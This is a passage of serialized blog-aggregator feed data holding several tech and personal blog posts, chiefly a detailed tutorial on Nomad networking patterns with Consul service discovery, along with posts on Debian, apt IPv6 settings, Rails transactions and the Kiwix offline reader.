Debian is a freedom-respecting operating system maintained and developed by its users around the globe. It is not controlled by a single entity and this makes it hard to compromise, making it one of the most secure operating systems on the earth.\nMy experience\nI started using Debian in August 2021 and I have tried all the branches of Debian: stable, testing and unstable. I was not using only Debian in this time frame and have switched to PureOS for around 6 months. Personally, I faced no problems in using Debian. I found that even testing branch is stable enough to be my daily driver. Currently, I am running the stable branch of Debian Bullseye, along with adding backports to my sources file. The Desktop environment that has suited me the most as of now is KDE Plasma. I love it and whenever I switch to any other Desktop Environment, I do not feel at home.\nDebian with KDE Plasma desktop. Released under CC-BY-SA-4.0\n\nRead further\nWant to install Debian in your computer? or curious about how to contribute to Debian? Please check:\nGet Debian for your device.\nContribute to Debian.\nAn Indian shop sells hardware that can run fully free version of Debian.\nBuy a computer with Debian pre-installed.\nClevo is shipping laptops with Debian out-of-the-box.\nLibrem hardware(like laptops and mobile phones) can run Debian.\nIf you have any technical questions, please feel free to ask any of the Debian user support channels or Free Software Community of India.",[],{"slug":1587,"title":1588,"link":1589,"pubDate":1590,"contentSnippet":1591,"tags":1592,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"albony-mirror","Albony.xyz Mirror","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Falbony-mirror\u002F","Fri, 24 Jun 2022 16:35:04 +0000","mirror.albony.xyz Currently mirroring 11 repositories. (archlinux, endeavouros, linuxmint, artixlinux, cachylinux, fdroid, manjaro, armbian, termux, blackarch and chaotic-aur)\nThis mirror has 1Gbits\u002Fs bandwidth and it’s hosted in Nagpur, India. I get more than 14TB in traffic and more than 14 Million requests per month, and around 2TB every week, sometimes even more. You can support me by donating at: https:\u002F\u002Fmirror.albony.xyz\u002Fdonate.html Via BTC or buymecoffee",[],{"slug":1594,"title":1595,"link":1596,"pubDate":1597,"contentSnippet":1598,"tags":1599,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"apt-ipv6","APT mirror connection issue: IPv6","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fapt-ipv6\u002F","Mon, 16 May 2022 15:12:24 +0530","The Problem when I did sudo apt update && sudo apt upgrade -y I noticed that it was trying to connect to the ubuntu mirror over IPv6 (and failing) My ISP hasn’t enabled IPv6 for me, so I can’t connect over IPv6. and I don’t have any IPv6 DNS servers. But still apt was trying to connect over IPv6… weird… The Fix You can create a file in the \u002Fetc\u002Fapt\u002Fapt.conf.d directory to force apt to use IPv4 echo 'Acquire::ForceIPv4 \"true\";' | sudo tee \u002Fetc\u002Fapt\u002Fapt.",[],{"slug":1601,"title":1602,"link":1603,"pubDate":1604,"contentSnippet":1605,"tags":1606,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"nomad-networking-explained","Understanding Networking in Nomad","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnomad-networking-explained\u002F","2022-05-13T18:40:55.000Z","Nomad is a general-purpose cluster orchestrator and scheduler. Up until Nomad 1.3 was released, it had no native support for discovering other applications running in the cluster. This is sort of a very elementary requirement when scheduling tasks in a cluster. Nomad relies on Consul to discover other “services” and has first class support for registering and fetching service records which makes things easier. Consul provides the records via various mechanisms such as a REST API, DNS and Consul Templates which render the exact IP\u002FPort of the service in a Go template that can be injected into your application.\nI’ve been using Nomad since quite some time (both at work and for my self hosted instance) however I’ve often tripped when it comes to Networking. Nomad has a lot of simple concepts and it all “clicks” once you understand and recognise various patterns that can be used to connect the applications. A major learning curve for someone new to Nomad and trying to integrate Consul is that the person now has to first understand how Consul works, deploy a Consul cluster and this creates a lot of friction amongst newcomers to Nomad. Nomad 1.3 solves a part of this issue (i.e. no need to run Consul for basic service discovery) and is a great fit for just getting started with Nomad based networking. However, in this post I’d like to go through all the different networking patterns I’ve known or used in production and make an attempt at simplifying these concepts for Nomad beginners.\nhere.\n\nScenario 1: Expose an application on the host#\n\nWe’ll start off with the simplest usecase: You have a redis container and you want to expose that to the host. The docker run equivalent to what we wanna do is:\ndocker run --rm -p=6379 redis:7\nThis command exposes a dynamic port on your host. To see what exactly is the port number, you can do docker ps and find out an output similar to 0.0.0.0:49153->6379\u002Ftcp under PORTS.\nTo verify, I can use redis-cli to connect to this host:\n$ redis-cli -p 49153                \n127.0.0.1:49153> ping\nPONG\nFantastic! Now, let’s stop this container and see how we can do the same in Nomad.\njob \"redis\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"redis\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\n\n    task \"redis\" {\n      driver = \"docker\"\n\n      config {\n        image = \"redis:7\"\n        ports = [\"redis\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 256\n      }\n    }\n  }\n}\nThis is a barebones definition of how to run Redis on Nomad. We’re not dealing with any volume mounts, custom config etc here - the idea is to only learn networking concepts in Nomad!\nSave the above file as job.nomad and deploy to the cluster with:\nnomad run job.nomad\nWithin a few lines of config, we have a Docker container running, which exposes a dynamic port 23522.\n\nWe can connect to it via redis-cli on our host:\n$ redis-cli -p 23522\n127.0.0.1:23522> ping\nPONG\nNOTE: It’s important to have ports in your task.config section. Nomad passes this information to the docker daemon running on the host. So unless you specify which ports to advertise in the container, it won’t know whether to expose 6379 or not.\nThis can be easily verified with docker inspect:\n# without `ports`\n$ docker inspect fc32a4ffd148 -f \"{{json .NetworkSettings.Ports }}\" | jq '.'\n{\n  \"6379\u002Ftcp\": null\n}\n\n# with `ports`\n$ docker inspect 0421101d0228 -f \"{{json .NetworkSettings.Ports }}\" | jq '.'\n{\n  \"6379\u002Ftcp\": [\n    {\n      \"HostIp\": \"127.0.0.1\",\n      \"HostPort\": \"31930\"\n    }\n  ],\n  \"6379\u002Fudp\": [\n    {\n      \"HostIp\": \"127.0.0.1\",\n      \"HostPort\": \"31930\"\n    }\n  ]\n}\nExposing Static ports#\nA less common scenario is to bind an application to a static port on the host. We’ll cover an example of when you want to do that a bit later, but this is generally not widely used because in a cluster your application can “float” around and the idea of sticking to a port is not useful. However, there’s a way for us to do that by simply adding a static line in our port block:\n    network {\n      port \"redis\" {\n        to     = 6379\n        static = 6379\n      }\n    }\n\nWhen we deploy the same file again, we can see the port allocation has changed from dynamic to the static port we assigned. It’s your job to ensure no other applications are listening on that same interface and port because that’s bound to cause conflicts.\nScenario 2: Communicate to Redis within the same group#\nFor this scenario, we are going to assume there’s a Go application that needs to talk to Redis. However, in this scenario, the Redis is sort of like an ephemeral cache, so it’s okay to deploy both of them in the same Task Group.\n\nA Group can contain multiple tasks. What's important to know here is that a group will always have its own shared network namespace. This means, that if you have 2 tasks in the group, they both will have access to the same network namespace. This allows both tasks to talk to each other on the same network interface.\n\njob \"hello\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"app\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"app\" {\n        to     = 8080\n        static = 8080\n      }\n      port \"redis\" {\n        to     = 6379\n        static = 6379\n      }\n    }\n\n    task \"redis\" {\n      driver = \"docker\"\n\n      config {\n        network_mode = \"host\"\n        image        = \"redis:7\"\n        ports        = [\"redis\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 256\n      }\n    }\n\n\n    task \"app\" {\n      driver = \"docker\"\n      env {\n        DEMO_REDIS_ADDR = \"${NOMAD_ADDR_redis}\"\n      }\n\n      config {\n        network_mode = \"host\"\n        image        = \"mrkaran\u002Fhello-app:1.0.0\"\n        ports        = [\"app\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 512\n      }\n    }\n  }\n}\nKey Points:\nYou can see we have defined task app and task redis under the same group, app. This means that Nomad will co-locate both of these tasks on the same client (because they tend to share not just the same network namespace but a common allocation directory as well - which makes it super easy to share files across tasks).\nWe are using NOMAD_ADDR_redis to get the IP:Port combination for the redis task. This gets injected at runtime by Nomad. You can find a list of runtime variables here.\nThis is ideal for quick tests\u002Fdev setup where you don’t want the overhang of Service Discovery etc and want to connect to your applications in the least friction possible.\nThe above config is suitable if you’re migrating from docker-compose based environments, you can use this template for your services. The biggest limitation of this approach is that it’s using a host network so it’s not possible to set up any kind of Access Controls on it. This effectively means that nothing prevents any other application on the cluster to talk to these ports.\nScenario 3: Communicate across different groups#\nTask Groups are useful if you have related tasks (like the init task where you wanna fetch the files before the task starts). But a drawback of using group is that you can’t scale the tasks independently. In the above example, we placed Redis and App in the same group, but that means if you increase count of same group to scale the app, you end up scaling Redis containers too. This is undesirable as Redis may not to scale proportionally to app.\nThe way to do create multiple groups is to split the tasks into their own individual groups:\njob \"hello\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"app\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"app\" {\n        to     = 8080\n        static = 8080\n      }\n    }\n\n    task \"app\" {\n      driver = \"docker\"\n      env {\n        DEMO_REDIS_ADDR = \"localhost:6379\"\n      }\n\n      config {\n        image = \"mrkaran\u002Fhello-app:1.0.0\"\n        ports = [\"app\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 512\n      }\n    }\n  }\n\n  group \"redis\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to     = 6379\n        static = 6379\n      }\n    }\n\n    task \"redis\" {\n      driver = \"docker\"\n\n      config {\n        image = \"redis:7\"\n        ports = [\"redis\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 256\n      }\n    }\n  }\n}\nWhen you submit this job, you get 2 allocation IDs (each group creates one alloc). The key point here is that both of these groups have their own network namespace. So, we don’t really have any way to reach the other application (we can’t really rely on the host network, because there’s no guarantee that both of these groups will be deployed on the same node).\nIn the previous example, we saw how Nomad exposes runtime variables that contained information about all tasks in other groups. But now since the groups are separate, the app container has no idea about redis (or vice-versa):\nenv | grep NOMAD\nNOMAD_REGION=global\nNOMAD_CPU_LIMIT=4700\nNOMAD_IP_app=127.0.0.1\nNOMAD_JOB_ID=hello\nNOMAD_TASK_NAME=app\nNOMAD_SECRETS_DIR=\u002Fsecrets\nNOMAD_CPU_CORES=1\nNOMAD_NAMESPACE=default\nNOMAD_ALLOC_INDEX=0\nNOMAD_ALLOC_DIR=\u002Falloc\nNOMAD_JOB_NAME=hello\nNOMAD_HOST_IP_app=127.0.0.1\nNOMAD_SHORT_ALLOC_ID=a9da72dc\nNOMAD_DC=dc1\nNOMAD_ALLOC_NAME=hello.app[0]\nNOMAD_PORT_app=8080\nNOMAD_GROUP_NAME=app\nNOMAD_PARENT_CGROUP=nomad.slice\nNOMAD_TASK_DIR=\u002Flocal\nNOMAD_HOST_PORT_app=8080\nNOMAD_MEMORY_LIMIT=512\nNOMAD_ADDR_app=127.0.0.1:8080\nNOMAD_ALLOC_PORT_app=8080\nNOMAD_ALLOC_ID=a9da72dc-94fc-6315-bb37-63cbeef153b9\nNOMAD_HOST_ADDR_app=127.0.0.1:8080\nService Discovery#\nThis is where things get interesting. The app group needs to discover redis before connecting to it. There are multiple ways to do that, but we’ll cover 2 standard ways which are more common.\nUsing Nomad native service discovery#\n\nThis is a feature launched in Nomad 1.3. Up until this release, Nomad had to rely on Consul for this. But with native service discovery built in Nomad, things are much simpler. Let’s make the following changes to our job file. In each group, we’ll add a service definition:\n  group \"app\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"app\" {\n        to = 8080\n      }\n    }\n\n    service {\n      name     = \"app\"\n      provider = \"nomad\"\n      port     = \"app\"\n    }\n    \u002F\u002F task is the same\n  }\n\n  group \"redis\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\n\n    service {\n      name     = \"redis\"\n      provider = \"nomad\"\n      port     = \"redis\"\n    }\n    \u002F\u002F task is the same\n  }\nSo, we added a new service block and got rid of static ports. Well, there’s no need to bind to static ports when we’re using service discovery.\nAfter submitting the job, we can use the nomad service list command to ensure the services are registered with Nomad.\nnomad service list    \nService Name  Tags\napp           []\nredis         []\nTo find out details about a particular service, we can use nomad service info:\n$ nomad service info app      \nJob ID  Address          Tags  Node ID   Alloc ID\nhello   127.0.0.1:29948  []    d92224a5  5f2ac51f\n$ nomad service info redis\nJob ID  Address          Tags  Node ID   Alloc ID\nhello   127.0.0.1:22300  []    d92224a5  8078c9a6\nPerfect! We can see the dynamic port assignment in each of the services. To use this config in our app, we will template it:\n    task \"app\" {\n      driver = \"docker\"\n\n      template {\n        data = \u003C\u003CEOH\n{{ range nomadService \"redis\" }}\nDEMO_REDIS_ADDR={{ .Address }}:{{ .Port }}\n{{ end }}\nEOH\n\n        destination = \"secrets\u002Fconfig.env\"\n        env         = true\n      }\n\n      config {\n        image = \"mrkaran\u002Fhello-app:1.0.0\"\n        ports = [\"app\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 512\n      }\n    }\nWe added the template stanza which will interpolate the env variables in the container. We loop over nomadService and get the address and port of the redis service. This makes it convenient for tasks on other nodes to discover each other.\nUsing Consul Service Discovery#\n\nJust by tweaking provider in our service block, we can use the Consul agent for service discovery.\n    service {\n      name     = \"app\"\n      provider = \"consul\"\n      port     = \"app\"\n    }\n\n\n    task \"app\" {\n      driver = \"docker\"\n\n      template {\n        data = \u003C\u003CEOH\n{{ range service \"redis\" }}\nDEMO_REDIS_ADDR={{ .Address }}:{{ .Port }}\n{{ end }}\nEOH\n\nEnsure that you're running Consul and have connected Nomad to it. Please refer to docs for the same.\n\nSince now we are using consul for registering services, we have to loop over service instead of nomadService. The rest of the things remain pretty much the same. I really like how with just 2 lines of code you can switch between Nomad\u002FConsul for discovering services.\nNow, of course, there are certain advantages to using Consul:\nYou can query the address of the service with DNS:\ndoggo redis.service.consul @tcp:\u002F\u002F127.0.0.1:8600\nNAME                    TYPE    CLASS   TTL ADDRESS     NAMESERVER     \nredis.service.consul.   A       IN      0s  172.20.10.3 127.0.0.1:8600  \nDefine health checks. Since it’s a new feature, health checks on Nomad service aren’t there but there’s a GitHub issue open for the same.\nUpdate (2024): Native health checks are now available in Nomad since version 1.4 (released October 2022). This means you can define health checks directly in your Nomad service definitions without requiring Consul. You can read more about this in the Nomad documentation.\nAccessible by applications outside Nomad. In case consul is used by other applications outside of the Nomad cluster, they can still get their address (using DNS or REST APIs)\nHowever, Nomad native service discovery is perfect for local setups and even smaller use-cases in production because it eliminates the need of running Consul in your stack which is a big thing!\nScenario 4: Restricting access to certain namespaces#\n\nIn all the above scenarios, we found that the service gets exposed to the local Nomad client. In case you’re running multiple namespaces on your cluster, you’d like to not expose them at all. In addition, you may want to express fine-grained controls on which application can access a particular service. All of this is possible via a Service Mesh. Nomad provides a way to have a “service mesh” via Consul Connect. Consul Connect can do mTLS and service authorization. Under the hood, it’s an Envoy proxy that runs alongside your app (sidecar is a fancy way to say that). The consul agent configures an Envoy configuration for you so it’s all pretty seamless.\nFor this to work, the first thing we need is a bridge network mode. This network model is actually a CNI plugin and needs to be installed separately in \u002Fopt\u002Fcni\u002Fbin. Follow the steps mentioned here.\n    network {\n      mode = \"bridge\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\nThe service in redis is called as a Consul Connect Ingress:\n    service {\n      name     = \"redis\"\n      provider = \"consul\"\n      port     = \"6379\"\n      connect {\n        sidecar_service {}\n      }\n    }\nIt’s an empty block because we don’t need to define any upstream here. The rest of the values will be default values.\nNext, we create a service for our app and that is a Consul Connect Egress:\n    service {\n      name     = \"app\"\n      provider = \"consul\"\n      port     = \"app\"\n      connect {\n        sidecar_service {\n          proxy {\n            upstreams {\n              destination_name = \"redis\"\n              local_bind_port  = 6379\n            }\n          }\n        }\n      }\n    }\nHere  we define an upstream for redis. If you notice closely, we are using a port number in Consul Connect Ingress. For some reason, if you use a named port instead of 6379 it doesn’t work. I am not entirely sure if it’s a bug or it’s intended to work like this.\nSo here, when the app wants to talk to redis, it talks to localhost:6379 which is the local port that the Envoy sidecar is listening to. We can verify that using netstat:\n$ netstat -tulpvn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\u002FProgram name    \ntcp        0      0 127.0.0.2:19001         0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:23237           0.0.0.0:*               LISTEN      -                   \ntcp        0      0 127.0.0.1:6379          0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::8080                 :::*                    LISTEN      1\u002F.\u002Fhello.bin\nThe traffic is sent from this port to the other Envoy proxy on a port that it advertises (and Consul automagically configured). That Envoy proxy further sends the traffic to the redis container on port 6379. The proxied traffic is securley encrypted via mTLS and authorized (via Consul Intentions - not covered in this post).\nScenario 5: Exposing services to end-user#\n\nIn the first scenario, we discussed using static ports. Well, it turns out it’s super helpful if you want to define a Traffic Ingress service. Unlike K8s, Nomad doesn’t have any Ingress Controllers, so the best way is to deploy these web proxies on each node as a system job (which means it’s ensured to run on every client node) and bind them to a static port (say 443\u002F80). Then, configure your Load Balancers and register all the Nomad nodes as target IPs and their ports would be the static port you define. These Ingress proxies (like HAProxy\u002FNginx) can then be used to talk to your application via any of the patterns we’ve mentioned above.\nTypically, you’d want to use a “Host-Based” routing pattern for your ingress proxy to make a routing decision.\nFor eg, in case you have an a.example.org DNS record pointing to an ALB. Now, when the request comes to the ALB, it forwards to any one of the NGINX\u002FHAProxy. For HAProxy to correctly route the traffic to `a service, you can use a “Host” header.\nSummary#\nThese were some of the common networking patterns that I’m aware of. Since some of these concepts are not really straightforward I hope the explanation helped in bringing some clarity.\nThere’s much more to this topic like Consul Gateways and multiple kind of CNIs which tweak how networking happens in the cluster but those are some really advanced topics that are out of the scope for this post.\nFin!",[],{"slug":1608,"title":1609,"link":1610,"pubDate":1611,"contentSnippet":1612,"tags":1613,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-28","Which Clojure codebases should I read? How and why?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhich-clojure-codebases-to-read-how-and-why\u002Findex.html","Fri, 29 Apr 2022 00:00:00 +0000","Newcomers to Clojure so frequently ask this question that an FAQ\u002FGuide is being discussed, to add to the Clojure website. I struggled a lot with the question too, when starting off in Clojureland. Here are my notes and opinions.",[52,457,54],{"slug":1615,"title":1616,"link":1617,"pubDate":1618,"contentSnippet":1619,"tags":1620,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-29","Shell ain't a bad place to FP: part 2\u002FN: Functions as Unix Tools","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshell-aint-a-bad-place-to-fp-part-2-functions-as-unix-tools\u002Findex.html","Wed, 27 Apr 2022 00:00:00 +0000","Or, the one in which we hand-craft nano Unix tools using Bash functions.",[1397,1621,456,530],"unix",{"slug":1623,"title":1624,"link":1625,"pubDate":1626,"contentSnippet":1627,"tags":1628,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-30","Why and How I use \"Org Mode\" for my writing and more","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhy-and-how-i-use-org-mode\u002Findex.html","Tue, 19 Apr 2022 00:00:00 +0000","I find myself telling people that they will have to pry org-mode from my cold dead hands. Which befuddles me. Why, as an ingrate software nerd who has soured on software technology — talk about biting the hand that feeds — do I evince such strong sentiment about a software program?!",[457,54,243,1144,1629,532,1630,1631,246],"org_mode","notebooks","knowledge_management",{"slug":1633,"title":1634,"link":1635,"pubDate":1636,"contentSnippet":1637,"tags":1638,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"postgres-transaction-pitfalls-for-rails-developers-html","Postgres transaction pitfalls for rails developers","https:\u002F\u002Faboobacker.in\u002F2022\u002F04\u002F12\u002Fpostgres-transaction-pitfalls-for-rails-developers.html","2022-04-12T07:02:00.000Z","Rails abstract lot of database stuff away using Active record which is very convenient. But the convenience can bite back if we are not careful enough.\nHere I am going to list some common mistakes rails developers make and how to avoid them.\nHaving network calls on rails after_create\u002Fbefore_create callbacks\nActive record provides callback methods to perform some operations based on the changes in data. it includes before_create, after_create, after_commit etc. Rails wrap before_create and after_create inside the same transaction so that it can roll back when the exception is raised from any of these callbacks. after_commit is executed after the transaction is committed to the database. So if you have calls like\n\nclass MyModel \u003CApplicationRecord\n  before_create :fetch_data_from_server\n\n  def fetch_data_from_server\n    self.attribute = SlowApi.new(self).call\n  end\nend\n\n\nThe transaction will remain open for long time and that will cause locks and potentially deadlocks on tables.\nSolutions:\n\n1. Make network calls before transaction begins, ie before the save method is called\n\n2. Make the API call in after commit callback\n\n\nScheduling Background jobs from after_create\u002Fbefore_create callbacks\nThis is very similar to the previous point, as the backgrounds jobs typically use another data store like Redis and the communication will be over the network. This may not be significant on a small scale if the Redis is in the same infra and network latency is not significant. But any performance degradation on redis infra will cause a sudden spike in long transactions and can potentially cause cascading failures on the infrastructure.\nSolutions:\n\n1. Schedule background jobs from after_commit callback\n2. Move job scheduling out of rails callbacks\n\n\nNested transactions\nWhen you have nested services you might end up with nested transactions as well.\n\nclass OrderCreator\n  def call\n    Order.transaction do\n      adjust_currency_conversion\n      ...\n      InventoryUpdateService.new.call\n    end\n  end\nend\n\nclass InventoryUpdateService\n  def call\n   Inventory.transaction(require_new: true) do\n     deduct_inventory_from_primary_store\n     run_inventory_sync\n   end\n  end\nend\n\n\nThis can cause performance bottlenecks due to the SAVEPOINT behaviour, Skipping it here as Gilab wrote a great blog on this here\nLast but the not least is about adding transaction block where it is not necessary, for instance if there won’t any data corruption if the operations ran individually, or the impact is very minimal which gets fixed on background worker retry, then avoid using database transactions\nAlso checkout these two great gems which allows us to reduce transaction burdern on database.\nafter_commit_everywhere\nisolator",[],"Aboobacker M K","tachyons","https:\u002F\u002Faboobacker.in\u002Ffeed.xml",{"slug":1643,"title":1644,"link":1645,"pubDate":1646,"contentSnippet":1647,"tags":1648,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fsci-doing-ama-on-reddit","Free Software Community of India will Do 'Ask Me Anything' on Reddit","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffsci-doing-ama-on-reddit\u002F","Sat, 09 Apr 2022 02:01:36 +0530","Free Software Community of India will be doing an ‘Ask Me Anything’ session on r\u002FIndia subreddit. One of the moderators of the r\u002FIndia reached out to us via filling the contact form on the website as well as in our chat group. As soon as I saw that the person filled the form, I replied it by email. It took some time for the community to arrive at a date and time for conducting the AMA, but now it is finalized to be 12 April 2022 17:00 IST.\nAkshay created a Reddit account for FSCI and shared the credentials. Me, Praveen, Akshay and Arya will be answering the AMA. Hopefully, this will raise awareness about Free Software in India and the existence of our community. Our community is always in the ‘Ask us Anything’ mode because of our welcoming nature and our active lookout for new people to get involved. So if you miss the AMA due to some reason, then you can just ask us in our chat group. AMA is just one more way to ask us questions.\nSo, tune into r\u002FIndia subreddit on 12 April at 5 PM IST. Ask me anything. See you there.",[],{"slug":1650,"title":1651,"link":1652,"pubDate":1653,"contentSnippet":1654,"tags":1655,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"selfish-gene","The Selfish Gene Book Overview","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fselfish-gene\u002F","Fri, 08 Apr 2022 11:39:20 +0530","Yesterday I finished reading The Selfish Gene by Richard Dawkins. The book reminds me of Daniel Kahneman’s Thinking Fast and Slow, which explores how the human brain makes decisions. In contrast, The Selfish Gene puts forward how genes make decisions and manipulate our decisions for their own benefit, keeping in mind that ‘selfish’ is just a metaphor and a gene has no motive or will of its own. The book presents some very great ideas by other scientists and by the author himself, and for this reason I suggest you to read it.\nThe larger the percentage of genes shared by the two individuals, the higher the chance of them behaving cooperatively towards each other. Each gene in a human body, and in many organisms from the animal kingdom, has a 50% chance of being in any of the person’s sibling. The same goes for the parents, i.e, Each gene in a human body has a 50% chance to be in each of its parent’s body and 50% chance of being in each offspring’s body. Interesting questions raise from the gene point of view, why then a human body care more for their offspring than its siblings? Why there is an asymmetric relationship between parental care towards the offspring and offspring care towards the parent? After all, genetically, the investment in each individual of that organism is the same.\nThe book also asks whether parents should invest equally in all their offsprings? How offsprings compete for resources provided by the parent? Parents also try to minimize their effort and investment in the offspring and instead try to manipulate their mate to take more responsibility for the offspring. Why females have a sudden menopause, while males do not go through such a thing?\nThere are even more interesting questions, such as, why we should look an organism as a whole unit? Why not consider a pack of wolves as a single unit? An organism, like me or you, is made up of complicated parts, each acting somewhat in unity. But what is so special about an organism to treat it as a single unit? Why did the genes or replicators chose to live in complicated bodies like animals?\nThe arguments and the selfishness surrounding them might make you cynical, but the author is optimistic that humans can be taught to be altruistic, and that gives us one more reason to teach children to be altruistic.",[],{"slug":1657,"title":1658,"link":1659,"pubDate":1660,"contentSnippet":1661,"tags":1662,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kiwix-app","How To Read Wikipedia Offline","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkiwix-app\u002F","Thu, 31 Mar 2022 12:56:27 +0530","Recently I came to know about freedom-respecting Kiwix app and I found it cool. It is a reader for offline reading knowledge sources like Wikipedia or Project Gutenberg. There are many projects which you can download for offline reading, like AskUbuntu, sections of Wikipedia– like, Chemistry, History, Sociology, etc. RationalWiki (my favorite), Ted Talks, Khan Academy, ArchWiki, etc. You can download Wikivoyage and have travel guides for offline reading, as you might not have good internet access on the go. The files are downloaded in the free format .zim which are readable by the Kiwix reader. The files are compressed, which saves disk space and internet data while downloading. Further, the zim files make it easy to index, search, and selectively decompress. It can also export files into HTML and PDF formats.\nScreenshot of Kiwix Android app.  License: CC-BY-SA-4.0 \n\nThe app is available for download for all the major operating systems– Android, GNU\u002FLinux, iOS, Windows, macOS, Raspberry Pi. In the Android app, you can download content by going to the download section and clicking on the website you would like. For Desktop, just download a zim file from the Kiwix library and open it in the Kiwix app. The project also has a nice wiki documentation.\nScreenshot of Kiwix app in PureOS, with offline Wikipedia. License: CC-BY-SA-4.0 \n\nThe features make the app very usable for viewing the content offline. Getting the Wikipedia knowledge at one place, while clicking the links referring to the respective pages inside the same offline directory makes it very convenient to use. Check the features page for more details.\nAs much as I like offline reading due to internet being a distraction, other use cases are even better. The zim files can be downloaded and taken to places which are cut off from internet access, and spread knowledge there. Defector NGOs use Kiwix-desktop to smuggle knowledge of the outside world to North Korea, where internet is almost non-existent with extreme amounts of censorship. In Ghana, where schools have access to computers but not internet, a project downloaded Kiwix and the full English Wikipedia and Wiktionary on a portable hard drive and transferred it to school computer labs. Quoting the project, “Fewer than 10 percent of students had ever accessed Wikipedia before the training took place. Now half the students say the new resource has influenced their studies.”\nYou can use a Raspberry Pi to create a local server which can be used to access the downloaded content from 25 devices, which is another cool feature.\nWhen I downloaded the 87 GB Wikipedia zim file, I ran into an immediate problem: I couldn’t copy it into my USB drive due to FAT32 filesystem which can’t store files bigger than 4 GB. So, I backed up all the data on my USB drive and used this tutorial to format my USB drive into exFAT format, which supports larger file sizes.\nA drawback in the current form is that incrememtal updates are not available, which means if you download Wikipedia on 1 Feb 2022, and now you want the changes till date, then you cannot just update the changes, you need to download from scratch. The project is working on such features.\nI already started using Kiwix app almost exclusively for offline reading. Try it and I am sure you will find something useful for you.\nThe project relies on user donations, so I would like to urge you to support the Kiwix project by making donations.\nFinally, I leave you with some more screenshots of Kiwix. Enjoy :)\nMe reading AskUbuntu forum offline in my machine. License: CC-BY-SA-4.0 \n\n\n\nKiwix Desktop homepage. License: CC-BY-SA-4.0 \n\n\n\nReading RationalWiki on Kiwix Android. License: CC-BY-SA-4.0 \n\n\n\nWikimed on Kiwix app. License: CC-BY-SA-4.0",[],{"slug":1664,"title":1665,"link":1666,"pubDate":1667,"contentSnippet":1668,"tags":1669,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-31","n ways to FizzBuzz in Clojure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fn-ways-to-fizzbuzz-in-clojure\u002Findex.html","Fri, 25 Mar 2022 00:00:00 +0000","FizzBuzz is everywhere. Every programmer passes through its rite of passage, or at least bears witness to another. Over the years, many gentlenerds have taken it upon themselves to discover ever new ways to incant those hoary symbols. I hereby enjoin these few drops of Clojure to that roiling ocean of FizzBuzzery.",[52,456,457,49],{"slug":1671,"title":1672,"link":1673,"pubDate":1674,"contentSnippet":1675,"tags":1676,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-32","Shell ain't a bad place to FP: part 1\u002FN: McIlroy's Pipeline","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshell-aint-a-bad-place-to-fp-part-1-doug-mcilroys-pipeline\u002Findex.html","Fri, 11 Mar 2022 00:00:00 +0000","Or, the one in which we \"take apart\" Douglas McIlroy's pipeline from 1986. Doing so teaches an object lesson about the essence of modular, composable, functional architecture.",[1397,1621,456,530],{"slug":1678,"title":1679,"link":1680,"pubDate":1681,"contentSnippet":1682,"tags":1683,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"fast-sparsespearman","Fast &amp; memory efficient spearman correlation on sparse matrices","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2022\u002F03\u002F10\u002Ffast-sparsespearman\u002F","2022-03-09T18:30:00.000Z","The previous post formulated a solution for calculating spearman correlation\non sparse matrices. The trick was simple - we exploited the sparsity structure in our matrix to prevent it from being converted to a dense form at any step. For spearman correlation, following this line of thought\nis tricky, because the ranks are not sparse, at least not by default. We then used the property of covariance, where adding a constant quantity to all entries of a vector (or matrix) does not change \nits variance (or covariance) structure to come up with a solution that works great in theory and solves our purpose of keeping the memory footprint low. \nA notebook with an implementation here.\nHowever, the time benchmarks look awful - though we ended up saving memory, SparseSpearmanCor() was atleast 2 times slower than the 